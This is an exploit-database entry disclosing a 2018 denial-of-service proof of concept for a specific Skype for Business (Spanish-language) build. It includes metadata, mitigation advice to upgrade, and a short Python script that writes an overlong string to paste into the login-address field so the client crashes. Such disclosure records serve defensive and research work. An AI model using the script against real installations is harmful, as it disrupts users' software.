header-logo
Suggest Exploit
vendor:
Skype for Business
by:
Samuel Cruz
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Skype for Business
Affected Version From: 16.0.10730.20053
Affected Version To: 16.0.10730.20053
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:skype_for_business
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Pro x64
2018

Skype Empresarial Office 365 16.0.10730.20053 – ‘Dirección de inicio de sesión’ Denial of Service (PoC)

A denial of service vulnerability exists in Skype Empresarial Office 365 16.0.10730.20053 when a maliciously crafted 'Dirección de inicio de sesión' is used. An attacker can exploit this vulnerability to cause a denial of service condition. This is done by running a python code to generate a maliciously crafted 'Dirección de inicio de sesión' and then copying the context to clipboard. The attacker then pastes the clipboard on 'Dirección de inicio de sesión' and then attempts to log in. This causes the application to crash.

Mitigation:

Upgrade to the latest version of Skype Empresarial Office 365.
Source

Exploit-DB raw data:

# Exploit Title: Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of service (PoC)
# Discovery by: Samuel Cruz
# Discovery Date; 2018-08-29
# Vendor Homepage: https://www.skype.com/es/business/
# Tested Version: 16.0.10730.20053
# Tested on OS: Windows 10 Pro x64 es/home/

#Steps to produce the crash
#1.- Run python code : python SkypeforBusiness_16.0.10730.20053.py
#2.- Open SkypeforBusiness.txt and copy context to clipboard
#3.- Open Skype for business
#4.- Paste clipboard on "Dirección de inicio de sesión"
#5.- Iniciar sesión
#6.- Crashed

buffer = "\x41" * 595
f = open ("SkypeforBusiness.txt", "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR